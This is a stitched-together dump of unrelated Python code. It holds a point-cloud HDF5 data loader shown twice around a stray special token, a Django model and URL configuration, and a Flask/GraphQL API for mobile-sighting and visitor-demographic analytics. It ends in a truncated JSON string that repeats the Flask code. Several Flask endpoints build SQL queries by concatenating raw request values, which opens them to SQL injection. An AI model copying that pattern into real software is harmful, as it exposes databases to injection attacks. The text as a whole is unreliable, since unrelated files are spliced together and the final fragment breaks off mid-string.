import h5py
def rotate_z(theta, x):
theta = np.expand_dims(theta, 1)
outz = np.expand_dims(x[:, :, 2], 2)
sin_t = np.sin(theta)
cos_t = np.cos(theta)
xx = np.expand_dims(x[:, :, 0], 2)
yy = np.expand_dims(x[:, :, 1], 2)
outx = cos_t * xx - sin_t * yy
outy = sin_t * xx + cos_t * yy
return np.concatenate([outx, outy, outz], axis=2)
def augment(x):
bs = x.shape[0]
min_rot, max_rot = -0.1, 0.1
thetas = np.random.uniform(min_rot, max_rot, [bs, 1]) * np.pi
rotated = rotate_z(thetas, x)
min_scale, max_scale = 0.8, 1.25
scale = np.random.rand(bs, 1, 3) * (max_scale - min_scale) + min_scale
return rotated * scale
def standardize(x):
clipper = np.mean(np.abs(x), (1, 2), keepdims=True)
z = np.clip(x, -100 * clipper, 100 * clipper)
mean = np.mean(z, (1, 2), keepdims=True)
std = np.std(z, (1, 2), keepdims=True)
return (z - mean) / std
class ModelFetcher(object):
def __init__(self, fname, batch_size, down_sample=10, do_standardize=
True, do_augmentation=False):
self.fname = fname
self.batch_size = batch_size
self.down_sample = down_sample
with h5py.File(fname, 'r') as f:
self._train_data = np.array(f['tr_cloud'])
self._train_label = np.array(f['tr_labels'])
self._test_data = np.array(f['test_cloud'])
self._test_label = np.array(f['test_labels'])
self.num_classes = np.max(self._train_label) + 1
self.num_train_batches = len(self._train_data) // self.batch_size
self.num_test_batches = len(self._test_data) // self.batch_size
self.prep1 = standardize if do_standardize else lambda x: x
self.prep2 = (lambda x: augment(self.prep1(x))
) if do_augmentation else self.prep1
assert len(self._train_data
) > self.batch_size, 'Batch size larger than number of training examples'
self.perm = np.random.permutation(self._train_data.shape[1])[::self
.down_sample]
def train_data(self):
rng_state = np.random.get_state()
np.random.shuffle(self._train_data)
np.random.set_state(rng_state)
np.random.shuffle(self._train_label)
return self.next_train_batch()
def next_train_batch(self):
start = 0
end = self.batch_size
N = len(self._train_data)
perm = self.perm
batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)
while end < N:
yield self.prep2(self._train_data[start:end, perm]
), batch_card, self._train_label[start:end]
start = end
end += self.batch_size
def test_data(self):
return self.next_test_batch()
def next_test_batch(self):
start = 0
end = self.batch_size
N = len(self._test_data)
batch_card = self._train_data.shape[1] // self.down_sample * np.ones(
self.batch_size, dtype=np.int32)
while end < N:
yield self.prep1(self._test_data[start:end, 1::self.down_sample]
), batch_card, self._test_label[start:end]
start = end
end += self.batch_size
<|reserved_special_token_1|>
import numpy as np
import h5py
def rotate_z(theta, x):
theta = np.expand_dims(theta, 1)
outz = np.expand_dims(x[:, :, 2], 2)
sin_t = np.sin(theta)
cos_t = np.cos(theta)
xx = np.expand_dims(x[:, :, 0], 2)
yy = np.expand_dims(x[:, :, 1], 2)
outx = cos_t * xx - sin_t * yy
outy = sin_t * xx + cos_t * yy
return np.concatenate([outx, outy, outz], axis=2)
def augment(x):
bs = x.shape[0]
# rotation
min_rot, max_rot = -0.1, 0.1
thetas = np.random.uniform(min_rot, max_rot, [bs, 1]) * np.pi
rotated = rotate_z(thetas, x)
# scaling
min_scale, max_scale = 0.8, 1.25
scale = np.random.rand(bs, 1, 3) * (max_scale - min_scale) + min_scale
return rotated * scale
def standardize(x):
clipper = np.mean(np.abs(x), (1, 2), keepdims=True)
z = np.clip(x, -100 * clipper, 100 * clipper)
mean = np.mean(z, (1, 2), keepdims=True)
std = np.std(z, (1, 2), keepdims=True)
return (z - mean) / std
class ModelFetcher(object):
def __init__(
self,
fname,
batch_size,
down_sample=10,
do_standardize=True,
do_augmentation=False,
):
self.fname = fname
self.batch_size = batch_size
self.down_sample = down_sample
with h5py.File(fname, "r") as f:
self._train_data = np.array(f["tr_cloud"])
self._train_label = np.array(f["tr_labels"])
self._test_data = np.array(f["test_cloud"])
self._test_label = np.array(f["test_labels"])
self.num_classes = np.max(self._train_label) + 1
self.num_train_batches = len(self._train_data) // self.batch_size
self.num_test_batches = len(self._test_data) // self.batch_size
self.prep1 = standardize if do_standardize else lambda x: x
self.prep2 = (
(lambda x: augment(self.prep1(x))) if do_augmentation else self.prep1
)
assert (
len(self._train_data) > self.batch_size
), "Batch size larger than number of training examples"
# select the subset of points to use throughout beforehand
self.perm = np.random.permutation(self._train_data.shape[1])[
:: self.down_sample
]
def train_data(self):
rng_state = np.random.get_state()
np.random.shuffle(self._train_data)
np.random.set_state(rng_state)
np.random.shuffle(self._train_label)
return self.next_train_batch()
def next_train_batch(self):
start = 0
end = self.batch_size
N = len(self._train_data)
perm = self.perm
batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)
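        # note: only full batches are yielded; any final slice with end >= N is dropped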
while end < N:
yield self.prep2(
self._train_data[start:end, perm]
), batch_card, self._train_label[start:end]
start = end
end += self.batch_size
def test_data(self):
return self.next_test_batch()
def next_test_batch(self):
start = 0
end = self.batch_size
N = len(self._test_data)
batch_card = (self._train_data.shape[1] // self.down_sample) * np.ones(
self.batch_size, dtype=np.int32
)
while end < N:
yield self.prep1(
self._test_data[start:end, 1 :: self.down_sample]
), batch_card, self._test_label[start:end]
start = end
end += self.batch_size
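# A minimal usage sketch (assumes an HDF5 file with tr_cloud/tr_labels/
# test_cloud/test_labels datasets; the file name below is illustrative):
#
#   fetcher = ModelFetcher('ModelNet40_cloud.h5', batch_size=64,
#                          down_sample=10, do_augmentation=True)
#   for batch, card, labels in fetcher.train_data():
#       pass  # batch: (64, n_points, 3) clouds, card: point count per example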
from django.db import models
import eav
from django.utils import timezone
class RiskType(models.Model):
"""A model class used for storing data
about risk types
"""
name = models.CharField(max_length=255)
created = models.DateTimeField(default=timezone.now)
modified = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
eav.register(RiskType)
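# A minimal sketch of attaching dynamic attributes once eav.register(RiskType)
# has run; the 'Severity' attribute is illustrative, not defined by this app:
#
#   from eav.models import Attribute
#   Attribute.objects.create(name='Severity', datatype=Attribute.TYPE_TEXT)
#   risk = RiskType.objects.create(name='Flood')
#   risk.eav.severity = 'high'
#   risk.save()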
from django.conf.urls import patterns, include, url
from django.contrib import admin
from metainfo.views import DomainListView
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'metapull.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', DomainListView.as_view()),
url(r'^admin/', include(admin.site.urls)),
url(r'^domains/', include('metainfo.urls', namespace = 'domains')),
)
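# Note: patterns() was deprecated in Django 1.8 and removed in 1.10. A sketch
# of the modern equivalent (assuming metainfo.urls defines app_name):
#
#   from django.urls import include, path
#   urlpatterns = [
#       path('', DomainListView.as_view()),
#       path('admin/', admin.site.urls),
#       path('domains/', include('metainfo.urls', namespace='domains')),
#   ]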
# app/__init__.py
import json
from flask_api import FlaskAPI, status
import graphene
from graphene import relay
from graphene_sqlalchemy import SQLAlchemyConnectionField, SQLAlchemyObjectType
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import func
from flask import request, jsonify, abort, make_response
from flask_graphql import GraphQLView
from shapely.geometry import shape, Point
# local import
from instance.config import app_config
# For password hashing
from flask_bcrypt import Bcrypt
# initialize db
db = SQLAlchemy()
from app.models import Date, Area, LTESighting, SmallCell, Site, SightingsPerHourPerCountry, SightingsNew, SightingsBase, WideSighting, Journey
from app.models import Department as DepartmentModel
from app.ng_event_models import ZoneDistrict, AttractionTotal, Profile, PurchDistrict, DOWFrequency
class Department(SQLAlchemyObjectType):
class Meta:
model = DepartmentModel
interfaces = (relay.Node, )
class Query(graphene.ObjectType):
node = relay.Node.Field()
all_employees = SQLAlchemyConnectionField(Department)
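# Example relay-style query the /graphql endpoint below can serve (graphene
# camelCases field names; Department's own fields depend on DepartmentModel):
#
#   { allEmployees { edges { node { id } } } }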
def create_app(config_name):
app = FlaskAPI(__name__, instance_relative_config=True)
    # override Werkzeug's built-in password hashing utilities with Bcrypt.
bcrypt = Bcrypt(app)
schema = graphene.Schema(query=Query)
app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql', schema=schema, graphiql=True))
app.config.from_object(app_config[config_name])
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.init_app(app)
@app.route('/api/areas/create', methods=['POST'])
def create_areas():
        # read the new area's fields from the request
name = request.data.get('name', '')
geodata = request.data.get('geodata', '')
center_lat = request.data.get('center_lat')
center_lng = request.data.get('center_lng')
zoom = request.data.get('zoom')
area = Area(name=name, geodata=geodata, center_lat=center_lat, center_lng=center_lng, zoom=zoom)
area.save()
response = jsonify({
'id': area.id,
'name': area.name,
'geodata': area.geodata,
'center_lat' : area.center_lat,
'center_lng' : area.center_lng,
'zoom' : area.zoom,
'date_created': area.date_created,
'date_modified': area.date_modified
})
return make_response(response), 201
@app.route('/api/areas/delete', methods=['POST'])
def delete_areas():
        # read the id of the area to delete
id = request.data.get('id', 0)
area = Area.query.filter_by(id=id).first()
if (area is not None):
area.delete()
return make_response(jsonify({'id':id})), 200
@app.route('/api/sightingsperhour', methods=['GET'])
def get_sightingsperhour():
        # get the per-country sighting counts by hour
sightings = SightingsPerHourPerCountry.query.all()
results = []
for sighting in sightings:
results.append({'country' : sighting.country, 'hour' : sighting.hour, 'count' : sighting.count})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sightingsnew', methods=['POST'])
def sightingsnew():
sightings = db.session.query(SightingsBase.site_id, SightingsBase.country, func.count(SightingsBase.roundedtoday))\
.filter(SightingsBase.site_id.in_(request.data['selectedRow']))\
.filter(SightingsBase.roundedtoday.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))\
.group_by(SightingsBase.site_id, SightingsBase.country)\
            .order_by(SightingsBase.site_id, func.count(SightingsBase.roundedtoday).desc())
        results = []
for sighting in sightings.all():
results.append({'country' : sighting.country, 'site_id' : sighting.site_id, 'count' : sighting[2]})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/widesightingsnew', methods=['POST', 'GET'])
def widesightingsnew():
sightings = db.session.query(WideSighting.site_id, WideSighting.gender, func.count(WideSighting.gender))\
.filter(WideSighting.site_id.in_([138, 134]))\
.group_by(WideSighting.site_id, WideSighting.gender)
results = []
for sighting in sightings.all():
#gender = sighting.gender if len(sighting.gender) else 'unknown'
results.append({'site_id' : sighting.site_id, 'gender' : sighting.gender, 'count' : sighting[2]})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/widesightings', methods=['GET'])
def widesightings():
sightings = WideSighting.get_all()
results = []
for sighting in sightings:
results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sites', methods=['GET'])
def get_sites():
        # get all the sites
sites = Site.get_all()
results = []
for site in sites:
results.append(site.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/dates', methods=['GET'])
def get_dates():
        # get all the dates
dates = Date.get_all()
results = []
for date in dates:
results.append(date.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/areas', methods=['GET'])
def get_areas():
# get all the areas
areas = Area.get_all()
allSmallCells = SmallCell.get_all()
results = []
for area in areas:
smallcellInArea = []
for smallcell in allSmallCells:
smallcellInArea.append(smallcell.serialise())
obj = {
'id': area.id,
'name': area.name,
'date_created': area.date_created,
'date_modified': area.date_modified,
'center_lat' : area.center_lat,
'center_lng' : area.center_lng,
'zoom' : area.zoom,
'geodata': area.geodata,
'smallcells' : smallcellInArea
}
results.append(obj)
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/smallcells', methods=['GET'])
def get_smallcells():
allSmallCells = SmallCell.query.order_by(SmallCell.id).all()
results = []
for smallcell in allSmallCells:
results.append(smallcell.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/smallcells/update', methods=['POST'])
def update_smallcell():
smallcell_id = request.data.get('id', '')
site_id = request.data.get('site_id', '')
smallcell = SmallCell.query.filter_by(id=smallcell_id).first()
smallcell.site_id = site_id
smallcell.save()
return make_response(jsonify({ 'smallcell_id' : smallcell.id, 'site_id' : smallcell.site_id })), 200
@app.route('/api/sighting/byarea/<areaid>', methods=['GET'])
def get_sighting(areaid):
import string
area = Area.query.filter_by(id=areaid).first()
if area is None : return make_response(jsonify({ 'list' : [] })), 200
sites = []
for site in Site.get_all():
if area.contains(site):
sites.append(str(site.id))
def generate_random_data(num_rows):
import random
latitude = 51.51451110408478
longitude = -0.12620388576521444
result = []
for _ in range(num_rows):
dec_lat = random.random()/10
dec_lon = random.random()/10
result.append({'lat' : latitude + dec_lat, 'lng' : longitude + dec_lon})
return result
results = []
if (len(sites) > 0):
for row in db.session.execute('select * from get_gender_crossfilter(ARRAY[' + ','.join(sites) + '])'):
results.append(({ 'geos': generate_random_data(5), 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'timestamp' : row['__sighting_date'], 'count' : row['__count'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting/getgender/', methods=['POST'])
def get_gender():
site_ids = str(request.data.get('site_ids', ''))
from_sighting_date = request.data.get('selectedDates')[0]
to_sighting_date = request.data.get('selectedDates')[1]
import string
results = []
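        # NOTE: interpolating request values into SQL is injection-prone;
        # bound parameters via sqlalchemy.text() would be safer here.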
for row in db.session.execute("select * from get_gender(ARRAY[" + site_ids + "]," + "'" + from_sighting_date + "'" + "," + "'" + to_sighting_date + "'" + ")"):
results.append(({ 'site_id' : row['__site_id'], 'date_month' : row['__date_month'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'perc_visits' : row['__perc_visits'], 'scaled_visits' : row['__scaled_visits'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting/getgendertotals/', methods=['POST'])
def get_gender_age_totals():
site_ids = str(request.data.get('site_ids', ''))
from_sighting_date = request.data.get('selectedDates')[0]
to_sighting_date = request.data.get('selectedDates')[1]
import string
results = []
for row in db.session.execute("select * from get_gender_age_totals(ARRAY[" + site_ids + "]," + "'" + from_sighting_date + "'" + "," + "'" + to_sighting_date + "'" + ")"):
results.append(({ 'site_id' : row['__site_id'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], '__visits' : row['__visits'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting', methods=['GET'])
def get_sightings():
results = []
for sighting in LTESighting.get_all():
results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sitescomparison', methods=['POST'])
def get_sitescomparison():
sightings = LTESighting.query\
.filter(LTESighting.smallcell.has(SmallCell.site_id.in_(request.data['selectedRow'])))\
.filter(LTESighting.timestamp.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))
return make_response(jsonify({ 'list' : [sighting.serialise() for sighting in sightings] })), 200
@app.route('/api/sighting/bysite', methods=['GET'])
def get_sightings_by_site():
site_ids = (request.args.getlist('site_id'))
results = []
#should do this better with joins!
for sighting in LTESighting.query:
if (str(sighting.smallcell.site_id)) in site_ids : results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/origindestination/all', methods=['GET'])
def get_all():
journeys = Journey.query.all()
thing = {}
for journey in journeys:
if (journey.origin_id not in thing) :
thing[journey.origin_id] = {}
if (journey.destination_id not in thing[journey.origin_id] and journey.destination_id != journey.origin_id) :
thing[journey.origin_id][journey.destination_id] = journey.data['total']
return make_response(jsonify(thing)), 200
@app.route('/api/origindestination/<origin_id>', methods=['GET'])
def get_od(origin_id):
journeys = Journey.query.all()#.filter_by(origin_id=origin_id).all()
_j = []
for journey in journeys:
_j.append({'origin_id' : journey.origin_id, 'destination_id' : journey.destination_id, 'total' : journey.data['total']})
#_j.append({'origin_id' : journey.origin_id, 'data' : (journey.data)})
return make_response(jsonify({ 'list' : _j })), 200
@app.route('/api/ng_event/purchase/<home_district_name>/<type_visitor>', methods=['GET'])
def purchase(home_district_name, type_visitor):
days_sql = db.session.query(PurchDistrict.start_dow, func.count(PurchDistrict.start_dow))\
.group_by(PurchDistrict.start_dow)\
.filter(PurchDistrict.home_district_name.in_([home_district_name]))\
.filter(PurchDistrict.type_visitor.in_([type_visitor]))\
.order_by(func.count(PurchDistrict.start_dow).desc())\
.all()
gender_sql = db.session.query(PurchDistrict.gender, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender)\
.filter(PurchDistrict.home_district_name.in_([home_district_name]))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_age_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender, PurchDistrict.age)\
.filter(PurchDistrict.gender.isnot(None))\
.filter(PurchDistrict.age.isnot(None))\
.filter(PurchDistrict.home_district_name.in_([home_district_name]))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_age_rent_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent)\
.filter(PurchDistrict.gender.isnot(None))\
.filter(PurchDistrict.age.isnot(None))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
days_total = sum(i[1] for i in days_sql)
gender_total = sum(i[1] for i in gender_sql)
gender_age_total = sum(i[2] for i in gender_age_sql)
days_results = []
for result in days_sql:
days_results.append({ 'start_dow' : result.start_dow, 'count' : result[1], 'percent' : float(result[1])/float(days_total), 'total' : days_total})
gender_results = []
for result in gender_sql:
gender_results.append({'gender' : result.gender, 'count' : result[1], 'percent' : float(result[1])/float(gender_total)})
gender_age_results = []
for result in gender_age_sql:
gender_age_results.append({'gender' : result.gender, 'age' : result.age, 'count' : result[2], 'percent' : float(result[2])/float(gender_age_total)})
return make_response(jsonify({'days' : days_results, 'gender' : gender_results, 'gender_age' : gender_age_results})), 200
@app.route('/api/ng_event/purchase_affluence/<type_visitor>', methods=['GET'])
def purchase_rent(type_visitor):
gender_sql = db.session.query(PurchDistrict.gender, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender)\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_age_rent_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent)\
.filter(PurchDistrict.gender.isnot(None))\
.filter(PurchDistrict.age.isnot(None))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_total = sum(i[1] for i in gender_sql)
gender_results = []
for result in gender_sql:
gender_results.append({'gender' : result.gender, 'count' : result[1], 'percent' : float(result[1])/float(gender_total)})
gender_age_rent_results = []
for result in gender_age_rent_sql:
gender_age_rent_results.append({'gender' : result.gender, 'age' : result.age, 'rent' : result.rent, 'count' : result[3]})
return make_response(jsonify({'gender' : gender_results, 'gender_age_rent' : gender_age_rent_results})), 200
@app.route('/api/ng_event/districts', methods=['GET'])
def districts():
home_results = []
for result in db.session.query(ZoneDistrict.home_district_code, ZoneDistrict.home_district_name, func.sum(ZoneDistrict.visitors)).group_by(ZoneDistrict.home_district_code, ZoneDistrict.home_district_name).all():
home_results.append({'district_code' : result.home_district_code, 'district_name' : result.home_district_name, 'visitors' : result[2]})
work_results = []
for result in db.session.query(ZoneDistrict.work_district_code, ZoneDistrict.work_district_name, func.sum(ZoneDistrict.visitors)).group_by(ZoneDistrict.work_district_code, ZoneDistrict.work_district_name).all():
work_results.append({'district_code' : result.work_district_code, 'district_name' : result.work_district_name, 'visitors' : result[2]})
return make_response(jsonify({'work' : { 'list' : work_results }, 'home' : { 'list' : home_results }})), 200
@app.route('/api/ng_event/attractiontotals', methods=['GET'])
def attractiontotals():
results = []
for result in db.session.query(AttractionTotal.zone_visitors, AttractionTotal.num_visitors).all():
results.append({'zone_visitors' : result.zone_visitors, 'num_visitors' : result.num_visitors})
return make_response(jsonify({'totals' : { 'list' : results }})), 200
@app.route('/api/ng_event/profiles', methods=['GET'])
def profiles():
results = []
for result in db.session.query(Profile.country, Profile.nationality, Profile.name_province, Profile.gender, Profile.age, Profile.rent, Profile.type_visitor, Profile.date, Profile.day, Profile.period, Profile.name_tur_zone).limit(10000):
district = ''
if result.name_tur_zone == 'Zone 1' : district = 'Chamartin'
if result.name_tur_zone == 'Zone 2' : district = 'Chamberi'
if result.name_tur_zone == 'Zone 3' : district = 'Salamanca'
day = ''
if result.day == 'Monday' : day = 'Mon'
if result.day == 'Tuesday' : day = 'Tue'
if result.day == 'Wednesday' : day = 'Wed'
if result.day == 'Thursday' : day = 'Thu'
if result.day == 'Friday' : day = 'Fri'
if result.day == 'Saturday' : day = 'Sat'
if result.day == 'Sunday' : day = 'Sun'
results.append({'country' : result.country, 'nationality' : result.nationality, 'name_province' : district, 'gender' : result.gender, 'age' : result.age, 'rent' : result.rent, 'type_visitor' : result.type_visitor, 'date' : result.date, 'day' : day, 'period' : result.period, 'zone' : result.name_tur_zone })
return make_response(jsonify(results)), 200
@app.route('/api/ng_event/dowfreq', methods=['GET'])
def dowfreq():
results = []
for result in db.session.query(DOWFrequency.type_visitor, DOWFrequency.start_dow, DOWFrequency.start_hour, DOWFrequency.count).all():
results.append({'type_visitor' : result.type_visitor, 'start_dow' : result.start_dow, 'start_hour' : result.start_hour, 'count' : result.count })
return make_response(jsonify(results)), 200
return app
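# A minimal way to serve the app ('development' is an assumed key of
# app_config from instance/config.py):
#
#   app = create_app('development')
#   app.run()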
"step-4": "import json\nfrom flask_api import FlaskAPI, status\nimport graphene\nfrom graphene import relay\nfrom graphene_sqlalchemy import SQLAlchemyConnectionField, SQLAlchemyObjectType\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import func\nfrom flask import request, jsonify, abort, make_response\nfrom flask_graphql import GraphQLView\nfrom shapely.geometry import shape, Point\nfrom instance.config import app_config\nfrom flask_bcrypt import Bcrypt\ndb = SQLAlchemy()\nfrom app.models import Date, Area, LTESighting, SmallCell, Site, SightingsPerHourPerCountry, SightingsNew, SightingsBase, WideSighting, Journey\nfrom app.models import Department as DepartmentModel\nfrom app.ng_event_models import ZoneDistrict, AttractionTotal, Profile, PurchDistrict, DOWFrequency\n\n\nclass Department(SQLAlchemyObjectType):\n\n\n class Meta:\n model = DepartmentModel\n interfaces = relay.Node,\n\n\nclass Query(graphene.ObjectType):\n node = relay.Node.Field()\n all_employees = SQLAlchemyConnectionField(Department)\n\n\ndef create_app(config_name):\n app = FlaskAPI(__name__, instance_relative_config=True)\n bcrypt = Bcrypt(app)\n schema = graphene.Schema(query=Query)\n app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql',\n schema=schema, graphiql=True))\n app.config.from_object(app_config[config_name])\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n\n @app.route('/api/areas/create', methods=['POST'])\n def create_areas():\n name = request.data.get('name', '')\n geodata = request.data.get('geodata', '')\n center_lat = request.data.get('center_lat')\n center_lng = request.data.get('center_lng')\n zoom = request.data.get('zoom')\n area = Area(name=name, geodata=geodata, center_lat=center_lat,\n center_lng=center_lng, zoom=zoom)\n area.save()\n response = jsonify({'id': area.id, 'name': area.name, 'geodata':\n area.geodata, 'center_lat': area.center_lat, 'center_lng': area\n .center_lng, 'zoom': area.zoom, 'date_created': area.\n date_created, 'date_modified': area.date_modified})\n return make_response(response), 201\n\n @app.route('/api/areas/delete', methods=['POST'])\n def delete_areas():\n id = request.data.get('id', 0)\n area = Area.query.filter_by(id=id).first()\n if area is not None:\n area.delete()\n return make_response(jsonify({'id': id})), 200\n\n @app.route('/api/sightingsperhour', methods=['GET'])\n def get_sightingsperhour():\n sightings = SightingsPerHourPerCountry.query.all()\n results = []\n for sighting in sightings:\n results.append({'country': sighting.country, 'hour': sighting.\n hour, 'count': sighting.count})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sightingsnew', methods=['POST'])\n def sightingsnew():\n sightings = db.session.query(SightingsBase.site_id, SightingsBase.\n country, func.count(SightingsBase.roundedtoday)).filter(\n SightingsBase.site_id.in_(request.data['selectedRow'])).filter(\n SightingsBase.roundedtoday.between(request.data['selectedDates'\n ][0], request.data['selectedDates'][1])).group_by(SightingsBase\n .site_id, SightingsBase.country).order_by(SightingsBase.site_id,\n func.count(SightingsBase.roundedtoday).desc())\n results = []\n for sighting in sightings.all():\n results.append({'country': sighting.country, 'site_id':\n sighting.site_id, 'count': sighting[2]})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/widesightingsnew', methods=['POST', 'GET'])\n def widesightingsnew():\n sightings = db.session.query(WideSighting.site_id, 
WideSighting.\n gender, func.count(WideSighting.gender)).filter(WideSighting.\n site_id.in_([138, 134])).group_by(WideSighting.site_id,\n WideSighting.gender)\n results = []\n for sighting in sightings.all():\n results.append({'site_id': sighting.site_id, 'gender': sighting\n .gender, 'count': sighting[2]})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/widesightings', methods=['GET'])\n def widesightings():\n sightings = WideSighting.get_all()\n results = []\n for sighting in sightings:\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sites', methods=['GET'])\n def get_sites():\n sites = Site.get_all()\n results = []\n for site in sites:\n results.append(site.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/dates', methods=['GET'])\n def get_dates():\n dates = Date.get_all()\n results = []\n for date in dates:\n results.append(date.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/areas', methods=['GET'])\n def get_areas():\n areas = Area.get_all()\n allSmallCells = SmallCell.get_all()\n results = []\n for area in areas:\n smallcellInArea = []\n for smallcell in allSmallCells:\n smallcellInArea.append(smallcell.serialise())\n obj = {'id': area.id, 'name': area.name, 'date_created': area.\n date_created, 'date_modified': area.date_modified,\n 'center_lat': area.center_lat, 'center_lng': area.\n center_lng, 'zoom': area.zoom, 'geodata': area.geodata,\n 'smallcells': smallcellInArea}\n results.append(obj)\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/smallcells', methods=['GET'])\n def get_smallcells():\n allSmallCells = SmallCell.query.order_by(SmallCell.id).all()\n results = []\n for smallcell in allSmallCells:\n results.append(smallcell.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/smallcells/update', methods=['POST'])\n def update_smallcell():\n smallcell_id = request.data.get('id', '')\n site_id = request.data.get('site_id', '')\n smallcell = SmallCell.query.filter_by(id=smallcell_id).first()\n smallcell.site_id = site_id\n smallcell.save()\n return make_response(jsonify({'smallcell_id': smallcell.id,\n 'site_id': smallcell.site_id})), 200\n\n @app.route('/api/sighting/byarea/<areaid>', methods=['GET'])\n def get_sighting(areaid):\n import string\n area = Area.query.filter_by(id=areaid).first()\n if area is None:\n return make_response(jsonify({'list': []})), 200\n sites = []\n for site in Site.get_all():\n if area.contains(site):\n sites.append(str(site.id))\n\n def generate_random_data(num_rows):\n import random\n latitude = 51.51451110408478\n longitude = -0.12620388576521444\n result = []\n for _ in range(num_rows):\n dec_lat = random.random() / 10\n dec_lon = random.random() / 10\n result.append({'lat': latitude + dec_lat, 'lng': longitude +\n dec_lon})\n return result\n results = []\n if len(sites) > 0:\n for row in db.session.execute(\n 'select * from get_gender_crossfilter(ARRAY[' + ','.join(\n sites) + '])'):\n results.append({'geos': generate_random_data(5), 'gender':\n row['__gender'], 'age_range': row['__age_range'],\n 'timestamp': row['__sighting_date'], 'count': row[\n '__count']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting/getgender/', methods=['POST'])\n def get_gender():\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = 
request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n import string\n results = []\n for row in db.session.execute('select * from get_gender(ARRAY[' +\n site_ids + '],' + \"'\" + from_sighting_date + \"'\" + ',' + \"'\" +\n to_sighting_date + \"'\" + ')'):\n results.append({'site_id': row['__site_id'], 'date_month': row[\n '__date_month'], 'gender': row['__gender'], 'age_range':\n row['__age_range'], 'perc_visits': row['__perc_visits'],\n 'scaled_visits': row['__scaled_visits']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting/getgendertotals/', methods=['POST'])\n def get_gender_age_totals():\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n import string\n results = []\n for row in db.session.execute(\n 'select * from get_gender_age_totals(ARRAY[' + site_ids + '],' +\n \"'\" + from_sighting_date + \"'\" + ',' + \"'\" + to_sighting_date +\n \"'\" + ')'):\n results.append({'site_id': row['__site_id'], 'gender': row[\n '__gender'], 'age_range': row['__age_range'], '__visits':\n row['__visits']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting', methods=['GET'])\n def get_sightings():\n results = []\n for sighting in LTESighting.get_all():\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sitescomparison', methods=['POST'])\n def get_sitescomparison():\n sightings = LTESighting.query.filter(LTESighting.smallcell.has(\n SmallCell.site_id.in_(request.data['selectedRow']))).filter(\n LTESighting.timestamp.between(request.data['selectedDates'][0],\n request.data['selectedDates'][1]))\n return make_response(jsonify({'list': [sighting.serialise() for\n sighting in sightings]})), 200\n\n @app.route('/api/sighting/bysite', methods=['GET'])\n def get_sightings_by_site():\n site_ids = request.args.getlist('site_id')\n results = []\n for sighting in LTESighting.query:\n if str(sighting.smallcell.site_id) in site_ids:\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/origindestination/all', methods=['GET'])\n def get_all():\n journeys = Journey.query.all()\n thing = {}\n for journey in journeys:\n if journey.origin_id not in thing:\n thing[journey.origin_id] = {}\n if journey.destination_id not in thing[journey.origin_id\n ] and journey.destination_id != journey.origin_id:\n thing[journey.origin_id][journey.destination_id\n ] = journey.data['total']\n return 